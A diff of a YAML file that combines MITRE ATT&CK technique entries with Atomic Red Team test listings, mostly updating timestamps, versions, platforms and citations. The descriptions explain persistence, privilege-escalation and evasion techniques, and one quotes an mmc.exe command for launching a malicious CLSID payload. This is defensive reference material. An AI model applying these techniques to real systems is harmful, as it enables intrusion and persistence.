-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -18403,9 +18675,8 @@ defense-evasion:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests:
     - name: Create local account (Linux)
@@ -18588,7 +18859,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1127:
     technique:
@@ -18635,7 +18905,7 @@ defense-evasion:
         legitimate certificates that allow them to execute on a system and proxy execution
         of malicious code through a trusted process that effectively bypasses application
         control solutions.'
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:00:37.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Trusted Developer Utilities Proxy Execution
       x_mitre_detection: |-
@@ -18648,12 +18918,13 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_data_sources:
       - 'Command: Command Execution'
+      - 'Module: Module Load'
+      - 'Process: Process Metadata'
       - 'Process: Process Creation'
       x_mitre_defense_bypassed:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1127
     atomic_tests: []
   T1218.014:
@@ -18732,7 +19003,7 @@ defense-evasion:
         mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
         CLSID payload with the following command: <code>mmc.exe -Embedding C:\\path\\to\\test.msc</code>.(Citation:
         abusing_com_reg)"
-      modified: '2022-10-25T14:00:00.188Z'
+      modified: '2022-05-20T17:41:16.112Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: MMC
       x_mitre_detection: "Monitor processes and command-line parameters for suspicious
@@ -18754,7 +19025,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.010:
     technique:
@@ -18797,7 +19067,7 @@ defense-evasion:
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-11-29T15:56:50.370Z'
       name: Process Argument Spoofing
       description: |-
         Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
@@ -18821,8 +19091,6 @@ defense-evasion:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.012:
     technique:
@@ -18870,7 +19138,7 @@ defense-evasion:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -18908,8 +19176,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 privilege-escalation:
@@ -18958,7 +19224,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
           16, 2017.
         source_name: Microsoft SendNotifyMessage function
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.004Z'
       name: 'Process Injection: Extra Window Memory Injection'
       description: "Adversaries may inject malicious code into process via Extra Window
         Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -19010,29 +19276,28 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.011
     atomic_tests: []
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -19079,7 +19344,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -19111,8 +19376,8 @@ privilege-escalation:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -19126,6 +19391,10 @@ privilege-escalation:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -19138,11 +19407,14 @@ privilege-escalation:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1037:
@@ -19208,7 +19480,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.007:
     technique:
@@ -19297,7 +19568,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.013:
     technique:
@@ -19385,7 +19655,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.013
     atomic_tests: []
   T1543:
@@ -19470,7 +19739,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.006:
     technique:
@@ -19502,7 +19770,7 @@ privilege-escalation:
         Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
 
         Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:08:21.101Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: LC_LOAD_DYLIB Addition
       x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -19525,11 +19793,10 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -19587,14 +19854,13 @@ privilege-escalation:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1548.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:35:39.112Z'
       name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
       description: |-
         Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -19695,7 +19961,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.002
     atomic_tests: []
   T1548.003:
@@ -19726,7 +19991,7 @@ privilege-escalation:
         description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
           Does. Retrieved March 19, 2018.
         source_name: cybereason osx proton
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-14T16:28:19.781Z'
       name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
       description: |-
         Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -19760,8 +20025,6 @@ privilege-escalation:
       - User
       x_mitre_effective_permissions:
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1548.003
     atomic_tests:
     - name: Sudo usage
@@ -19879,7 +20142,7 @@ privilege-escalation:
           sudo visudo -c -f /usr/local/etc/sudoers
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -19898,7 +20161,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -19912,7 +20174,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -19939,8 +20200,8 @@ privilege-escalation:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -19971,12 +20232,13 @@ privilege-escalation:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1547:
     technique:
-      modified: '2024-04-16T12:26:07.945Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: Boot or Logon Autostart Execution
       description: |-
         Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -20048,9 +20310,9 @@ privilege-escalation:
           2017.
         url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Microsoft TimeProvider
         description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
         url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -20066,12 +20328,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547
     atomic_tests: []
   T1547.014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T14:17:17.353Z'
       name: Active Setup
       description: |-
         Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -20146,12 +20407,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.014
     atomic_tests: []
   T1484.002:
     technique:
-      modified: '2024-04-19T04:27:51.388Z'
+      modified: '2024-09-25T13:50:11.593Z'
       name: Domain Trust Modification
       description: "Adversaries may add new domain trusts, modify the properties of
         existing domain trusts, or otherwise change the configuration of trust relationships
@@ -20171,9 +20431,14 @@ privilege-escalation:
         trust modifications such as altering the claim issuance rules to log in any
         valid set of credentials as a specified user.(Citation: AADInternals zure
         AD Federated Domain) \n\nAn adversary may also add a new federated identity
-        provider to an identity tenant such as Okta, which may enable the adversary
-        to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
-        2023)"
+        provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+        may enable the adversary to authenticate as any user of the tenant.(Citation:
+        Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+        gain broad access into a variety of cloud-based services that leverage the
+        identity tenant. For example, in AWS environments, an adversary that creates
+        a new identity provider for an AWS Organization will be able to federate into
+        all of the AWS Organization member accounts without creating identities for
+        each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -20193,9 +20458,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '2.0'
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -20212,6 +20476,10 @@ privilege-escalation:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1484/002
         external_id: T1484.002
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
       - source_name: CISA SolarWinds Cloud Detection
         description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
           in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -20245,7 +20513,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.002
     atomic_tests: []
   T1543.003:
@@ -20401,31 +20668,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.003
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -20442,6 +20689,7 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -20452,9 +20700,13 @@ privilege-escalation:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -20462,8 +20714,24 @@ privilege-escalation:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests:
     - name: Cron - Replace crontab with referenced file
@@ -20582,7 +20850,7 @@ privilege-escalation:
           '
   T1098.003:
     technique:
-      modified: '2024-03-29T18:29:06.873Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Roles'
       description: "An adversary may add additional roles or permissions to an adversary-controlled
         cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -20612,6 +20880,7 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Alex Parsons, Crowdstrike
@@ -20622,6 +20891,7 @@ privilege-escalation:
       - Praetorian
       - Alex Soler, AttackIQ
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
         accounts to identify unusual activity in the assignment of roles to those
@@ -20630,13 +20900,13 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -20678,9 +20948,6 @@ privilege-escalation:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.003
     atomic_tests: []
   T1547.012:
@@ -20748,19 +21015,18 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.012
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -20776,8 +21042,8 @@ privilege-escalation:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
